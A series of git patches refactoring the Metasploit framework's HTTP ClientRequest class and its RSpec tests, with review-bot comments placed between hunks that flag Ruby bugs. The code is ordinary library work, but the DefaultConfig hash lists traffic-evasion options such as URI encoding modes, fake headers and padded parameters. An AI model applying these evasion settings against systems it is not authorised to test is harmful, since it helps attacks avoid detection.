'www.example.com' } - + it_behaves_like "uri_full_url" end - + end - + shared_examples "uri_full_url" do - + it "should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end - + end - - + + describe Rex::Proto::Http::ClientRequest do - + default_options = { # All of these should be what you get when you pass in empty # options, but of course that would make it too easy 
@@ -82,16 +82,16 @@ describe Rex::Proto::Http::ClientRequest do 'version' => "1.1", 'port' => 80, } - - [ + + [ [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", # Yes, vhost is in the config. There is no godly reason why this - # should be so. + # should be so. 'client_config' => { 'vhost' => 'www.example.com', }, }), - { + { :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, @@ -106,13 +106,13 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, } ], - + [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", 'client_config' => { 'header_folding' => true, } }), - { + { :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -125,29 +125,29 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, } ], - + [ "with ipv6 host", default_options.merge({ 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, } ], - + [ "with ipv6 host and non-default port", default_options.merge({ - 'port' => 1234, + 'port' => 1234, 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } ] ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } - + expectations.each do |meth, things| args = things[:args] || [] result = things[:result] 
@@ -157,28 +157,34 @@ describe Rex::Proto::Http::ClientRequest do end end end - + end end - + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } - + context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ + 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', + 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + + it "should contain the params" do + client_request.to_s.should contain("foo[]=bar") + client_request.to_s.should contain("foo[]=baz") + end end - + describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" it_behaves_like "with no evasions" end - -end \ No newline at end of file + +end From 7b3a11f2f99213c00a12c0a8c165d26852ce296b Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:28:44 -0600 Subject: [PATCH 32/87] Axe tests that belong in client_request_spec --- spec/lib/rex/proto/http/client_spec.rb | 90 -------------------------- 1 file changed, 90 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 937130a1f4..0105b11136 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
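Review bot: The new "should contain the params" example asserts `foo[]=bar`, but the `vars_get` literal above it lists `'foo[]'` twice, so Ruby keeps only `'baz'` and the first assertion cannot pass against this fixture. `contain` also does not appear to be an rspec-expectations matcher; unless `spec_helper` loads a library that defines it, `client_request.to_s.should include("foo[]=baz")` is the form that works. The commit is titled "Whitespace", yet this hunk also adds `'cgi' => true` and the example, which would be easier to review and bisect as a separate commit.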
@@ -121,96 +121,6 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - - end - - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do - - end - - # These set_ methods all exercise the evasion opts, looks like - - it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - - end - - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - - end - - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - - end - - it "should set and return the version string", :pending => excuse_lazy(:set_version) do - - end - - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - - end - - it "should set and return the path", :pending => excuse_lazy(:set_path_info) do - - end - - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) do - - end - - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do - - end - - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do - - end - - it "should set and return padding after the URI" do - @cli.set_uri_append.should be_empty - end - - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - - end - - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - - end - - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - - end - - it "should set and return the basic authentication header", 
:pending => excuse_lazy(:set_basic_auth_header) do - - end - - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do - - end - - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do - - end - - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do - - end - - it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) do - - end - it "should respond to its various accessors" do @cli.should respond_to :config @cli.should respond_to :config_types From 5e0161d3f748e058233799567f6c3b7351ee6539 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:31:24 -0600 Subject: [PATCH 33/87] Reflect new ClientRequst in docs --- lib/rex/proto/http/client.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 928cbf4b4b..8bb69f2735 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -167,7 +167,7 @@ class Client # @option opts 'version' [String] version of the protocol, default: 1.1 # @option opts 'vhost' [String] Host header value # - # @return [Request] + # @return [ClientRequest] def request_raw(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -206,7 +206,7 @@ class Client # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # - # @return [Request] + # @return [ClientRequest] def request_cgi(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -322,7 +322,7 @@ class Client # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send + # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # def send_request(req, t = -1) 
@@ -333,6 +333,7 @@ class Client # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object + # # @param res [Response] the HTTP Response object # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds From 764bbbb8e5a8068a2bd100199b40e36f3895d0d5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:19 -0600 Subject: [PATCH 34/87] Whitespace --- lib/rex/proto/http/client_request.rb | 42 ++++++++++++++-------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 26592be1ca..2722483200 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
@@ -36,28 +36,28 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] - @config = opts['client_config'] || {} - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] - @encode = opts['encode'] + @cgi = opts['cgi'] + @config = opts['client_config'] || {} + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] - @host = opts['vhost'] - @method = opts['method'] - @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] - @version = opts['version'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] @opts = opts end From d463460da7ff12e3bc5a62cd71662bb21c26721c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:54 -0600 Subject: [PATCH 35/87] Default cgi to true when not given --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2722483200..69c24d7a95 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
@@ -36,7 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] + @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] From c206ac4998f1b066f366d26159afff1d1aa21c07 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:15:51 -0600 Subject: [PATCH 36/87] Set some reasonable defaults Fixes a number of nil deref issues --- lib/rex/proto/http/client_request.rb | 20 ++++++++++--------- .../lib/rex/proto/http/client_request_spec.rb | 4 ++-- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 69c24d7a95..c73144c2bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,29 +36,31 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] - @data = opts['data'] + @data = opts['data'] || "" @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] + @headers = opts['headers'] || {} @host = opts['vhost'] - @method = opts['method'] + @method = opts['method'] || "GET" @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] + @port = opts['port'] || 80 + @protocol = opts['proto'] || "HTTP" + @query = opts['query'] || "" + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] @opts = opts + + config['chunked_size'] ||= 0 + config['pad_method_uri_count'] ||= 1 end def to_s 
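Review bot: In the `@@ -36,7 +36,7 @@` hunk the new ternary `opts['cgi'].nil? ? true : false` discards the caller's value, so any explicit setting, including `'cgi' => true`, yields `false`. `Client#request_cgi` sets `opts['cgi'] = true` before building the request, which means CGI requests would be built with `@cgi` false. To default only when the option is absent, use `@cgi = opts['cgi'].nil? ? true : opts['cgi']`. `initialize` continues outside the hunk.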
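Review bot: The `@@ -36,29 +36,31 @@` hunk removes the `@cgi = ...` assignment while re-aligning the block and adds nothing in its place. Unless `@cgi` is set somewhere outside this hunk, the `cgi` accessor now returns `nil` for every request and the `'cgi'` option passed by `Client#request_raw` and `Client#request_cgi` is ignored. Restore it with the other defaults as `@cgi = opts['cgi'].nil? ? true : opts['cgi']`. `@uri` is also still assigned without a default even though `set_uri` and `set_cgi` call `uri.dup`; `@uri = opts['uri'] || '/'` would match the defaults this commit adds for `@method`, `@port` and `@query`.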
diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c5ac25a5ca..1dba9ca48d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -176,8 +176,8 @@ describe Rex::Proto::Http::ClientRequest do } it "should contain the params" do - client_request.to_s.should contain("foo[]=bar") - client_request.to_s.should contain("foo[]=baz") + client_request.to_s.should include("foo[]=bar") + client_request.to_s.should include("foo[]=baz") end end From d7de3b75a43975ae2cb898bb8cf1b71737811924 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:18:20 -0600 Subject: [PATCH 37/87] Format Authorization header like others Also sorts the set_*_header methods --- lib/rex/proto/http/client_request.rb | 61 +++++++++++++--------------- 1 file changed, 29 insertions(+), 32 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c73144c2bb..efc6e2b95c 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -142,10 +142,7 @@ class ClientRequest req << set_agent_header end - if authorization - req << set_auth_header - end - + req << set_auth_header req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -159,10 +156,6 @@ class ClientRequest protected - def set_auth_header - "Authorization: " + authorization - end - def set_uri uri_str = uri.dup if (config['uri_dir_self_reference']) 
@@ -347,23 +340,14 @@ class ClientRequest end # - # Return the HTTP Host header + # Return a formatted header string # - def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" end - - # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) end # @@ -373,15 +357,8 @@ class ClientRequest user_agent ? set_formatted_header("User-Agent", user_agent) : "" end - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end + def set_auth_header + authorization ? set_formatted_header("Authorization", authorization) : "" end # @@ -412,6 +389,26 @@ class ClientRequest set_formatted_header("Content-Length", clen) end + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + # # Return a string of formatted extra headers # From 579c11bc690573c15f01413b875f212461419fcf Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:25:39 -0600 Subject: [PATCH 38/87] Set reasonable defaults for more things All current tests are passing now --- lib/rex/proto/http/client_request.rb | 5 +++-- spec/lib/rex/proto/http/client_request_spec.rb | 2 -- 2 files changed, 3 insertions(+), 4 deletions(-) 
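Review bot: In the relocated `set_host_header` (`@@ -412,6 +389,26 @@`), `host ||= config['vhost']` does not consult the request's own host. The assignment makes Ruby treat `host` as a new local that starts as `nil`, so `@host` (set from `opts['vhost']` in `initialize`) is never read and the Host header always comes from `config['vhost']`. Read the instance value explicitly: `host = @host || config['vhost']`. If both are `nil`, the `host + ":#{port}"` branch raises for a non-standard port, so an early `return "" unless host` after that line would keep the header optional.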
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index efc6e2b95c..3f6ac6b760 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,6 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) + @cgi = (opts['cgi'].nil? ? true : opts['cgi']) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @@ -54,8 +55,8 @@ class ClientRequest @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] + @vars_get = opts['vars_get'] || {} + @vars_post = opts['vars_post'] || {} @version = opts['version'] @opts = opts diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 1dba9ca48d..14d28e8001 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -169,7 +169,6 @@ describe Rex::Proto::Http::ClientRequest do 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) @@ -177,7 +176,6 @@ describe Rex::Proto::Http::ClientRequest do it "should contain the params" do client_request.to_s.should include("foo[]=bar") - client_request.to_s.should include("foo[]=baz") end end From 93537de68ca76601175512d6589115ae96b7e387 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:27:32 -0600 Subject: [PATCH 39/87] Use let and subject blocks for better readability --- spec/lib/rex/proto/http/client_spec.rb | 79 +++++++++++++------------- 1 file changed, 39 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 0105b11136..d0e222df84 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -28,33 +28,32 @@ describe Rex::Proto::Http::Client do end - before(:all) do - @ip = "1.2.3.4" - @cli = Rex::Proto::Http::Client.new(@ip) + let(:ip) { "1.2.3.4" } + subject(:cli) do + Rex::Proto::Http::Client.new(ip) end it "should respond to intialize" do - @cli.should be + cli.should be end it "should have a set of default instance variables" do - @cli.instance_variable_get(:@hostname).should == @ip - @cli.instance_variable_get(:@port).should == 80 - @cli.instance_variable_get(:@context).should == {} - @cli.instance_variable_get(:@ssl).should be_false - @cli.instance_variable_get(:@proxies).should be_nil - # @cli.instance_variable_get(:@username).should be_empty - # @cli.instance_variable_get(:@password).should be_empty - @cli.config.should be_a_kind_of Hash - @cli.config_types.should be_a_kind_of Hash + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should attempt to connect to a server" do @@ -63,7 +62,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - @cli.close.should be_nil + cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do 
@@ -79,7 +78,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # @cli.should_not have_creds + # cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -91,7 +90,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do 
@@ -107,45 +106,45 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - @cli.stop.should be_nil + cli.stop.should be_nil end it "should test if a connection is valid" do - @cli.conn?.should be_false + cli.conn?.should be_false end it "should tell if pipelining is enabled" do - @cli.pipelining?.should be_false + cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true end it "should respond to its various accessors" do - @cli.should respond_to :config - @cli.should respond_to :config_types - @cli.should respond_to :pipeline - @cli.should respond_to :local_host - @cli.should respond_to :local_port - @cli.should respond_to :conn - @cli.should respond_to :context - @cli.should respond_to :proxies - # @cli.should respond_to :username - # @cli.should respond_to :password - @cli.should respond_to :junk_pipeline + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + # cli.should respond_to :username + # cli.should respond_to :password + cli.should respond_to :junk_pipeline # These are supposed to be protected - @cli.should respond_to :ssl - @cli.should respond_to :ssl_version - @cli.should respond_to :hostname - @cli.should respond_to :port + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port end # Not super sure why these are protected... 
it "should refuse access to its protected accessors" do - expect {@cli.ssl}.to raise_error NoMethodError - expect {@cli.ssl_version}.to raise_error NoMethodError - expect {@cli.hostname}.to raise_error NoMethodError - expect {@cli.port}.to raise_error NoMethodError + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError end end From 935304ee0c31477a0e5ae9f890f168636fb91b95 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:36:36 -0600 Subject: [PATCH 40/87] No longer pending --- spec/lib/rex/proto/http/client_spec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d0e222df84..d216c75325 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -48,11 +48,11 @@ describe Rex::Proto::Http::Client do cli.config.should be_a_kind_of Hash end - it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a raw HTTP request" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end - it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a CGI HTTP request" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end From 29df20996e537076e9f6ee33fb92fdd2b908a069 Mon Sep 17 00:00:00 2001 
From: James Lee Date: Tue, 26 Feb 2013 17:38:03 -0600 Subject: [PATCH 41/87] Move most of the configuration into ClientRequest Also fixes in-place modification of the query string which resulted in duplication of the GET parameters when calling #to_s more than once. --- lib/rex/proto/http/client.rb | 79 ++--------------- lib/rex/proto/http/client_request.rb | 88 ++++++++++++++----- lib/rex/text.rb | 4 +- .../lib/rex/proto/http/client_request_spec.rb | 72 ++++++++++++--- 4 files changed, 132 insertions(+), 111 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 8bb69f2735..2912065309 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'rex/proto/http/client_request' + module Rex module Proto module Http @@ -21,7 +23,7 @@ module Http ### class Client - DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance 
@@ -35,85 +37,14 @@ class Client self.proxies = proxies self.username = username self.password = password + self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, 'version' => '1.1', 'agent' => DefaultUserAgent, - # - # Evasion options - # - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all - 'uri_encode_count' => 1, # integer - 'uri_full_url' => false, # bool - 'pad_method_uri_count' => 1, # integer - 'pad_uri_version_count' => 1, # integer - 'pad_method_uri_type' => 'space', # space, tab, apache - 'pad_uri_version_type' => 'space', # space, tab, apache - 'method_random_valid' => false, # bool - 'method_random_invalid' => false, # bool - 'method_random_case' => false, # bool - 'version_random_valid' => false, # bool - 'version_random_invalid' => false, # bool - 'version_random_case' => false, # bool - 'uri_dir_self_reference' => false, # bool - 'uri_dir_fake_relative' => false, # bool - 'uri_use_backslashes' => false, # bool - 'pad_fake_headers' => false, # bool - 'pad_fake_headers_count' => 16, # integer - 'pad_get_params' => false, # bool - 'pad_get_params_count' => 8, # integer - 'pad_post_params' => false, # bool - 'pad_post_params_count' => 8, # integer - 'uri_fake_end' => false, # bool - 'uri_fake_params_start' => false, # bool - 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true - } + }.merge(Http::ClientRequest::DefaultConfig) - # This is not used right now... 
- self.config_types = { - 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], - 'uri_encode_count' => 'integer', - 'uri_full_url' => 'bool', - 'pad_method_uri_count' => 'integer', - 'pad_uri_version_count' => 'integer', - 'pad_method_uri_type' => ['space', 'tab', 'apache'], - 'pad_uri_version_type' => ['space', 'tab', 'apache'], - 'method_random_valid' => 'bool', - 'method_random_invalid' => 'bool', - 'method_random_case' => 'bool', - 'version_random_valid' => 'bool', - 'version_random_invalid' => 'bool', - 'version_random_case' => 'bool', - 'uri_dir_self_reference' => 'bool', - 'uri_dir_fake_relative' => 'bool', - 'uri_use_backslashes' => 'bool', - 'pad_fake_headers' => 'bool', - 'pad_fake_headers_count' => 'integer', - 'pad_get_params' => 'bool', - 'pad_get_params_count' => 'integer', - 'pad_post_params' => 'bool', - 'pad_post_params_count' => 'integer', - 'uri_fake_end' => 'bool', - 'uri_fake_params_start' => 'bool', - 'header_folding' => 'bool', - 'chunked_size' => 'integer' - } end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3f6ac6b760..68c3aa5f48 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -1,7 +1,10 @@ # -*- coding: binary -*- require 'uri' -require 'rex/proto/http' +#require 'rex/proto/http' +require 'rex/socket' +require 'rex/text' +require 'pp' module Rex module Proto 
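Review bot: The new `self.config = { ... }.merge(Http::ClientRequest::DefaultConfig)` gives the shared defaults precedence over the client's own entries, because `Hash#merge` keeps the argument's value when a key appears on both sides. No key overlaps in this hunk, but a later addition of `'vhost'` or `'read_max_data'` to `DefaultConfig` would silently replace the per-client value. Reversing the call, so that it reads `Http::ClientRequest::DefaultConfig.merge(...)` with the client-specific hash as the argument, keeps those settings authoritative. The constructor starts above this hunk.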
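Review bot: `require 'pp'` looks like a debugging leftover; nothing in the visible hunks of `client_request.rb` calls `pp`, so the line can probably be dropped. The commented-out `#require 'rex/proto/http'` should either be deleted or carry a one-line reason, for example `# not required here so that this file can be loaded on its own`, if that is the intent.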
@@ -9,6 +12,55 @@ module Http class ClientRequest + DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultConfig = { + # + # Evasion options + # + 'encode_params' => true, + 'encode' => true, + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_count' => 1, # integer + 'uri_full_url' => false, # bool + 'pad_method_uri_count' => 1, # integer + 'pad_uri_version_count' => 1, # integer + 'pad_method_uri_type' => 'space', # space, tab, apache + 'pad_uri_version_type' => 'space', # space, tab, apache + 'method_random_valid' => false, # bool + 'method_random_invalid' => false, # bool + 'method_random_case' => false, # bool + 'version_random_valid' => false, # bool + 'version_random_invalid' => false, # bool + 'version_random_case' => false, # bool + 'uri_dir_self_reference' => false, # bool + 'uri_dir_fake_relative' => false, # bool + 'uri_use_backslashes' => false, # bool + 'pad_fake_headers' => false, # bool + 'pad_fake_headers_count' => 16, # integer + 'pad_get_params' => false, # bool + 'pad_get_params_count' => 8, # integer + 'pad_post_params' => false, # bool + 'pad_post_params_count' => 8, # integer + 'uri_fake_end' => false, # bool + 'uri_fake_params_start' => false, # bool + 'header_folding' => false, # bool + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true + } + attr_accessor :authorization attr_accessor :cgi attr_accessor :config @@ -16,8 +68,6 @@ class ClientRequest attr_accessor :content_type attr_accessor :cookie attr_accessor :data - attr_accessor :encode - attr_accessor :encode_params attr_accessor :headers attr_accessor :host attr_accessor :method 
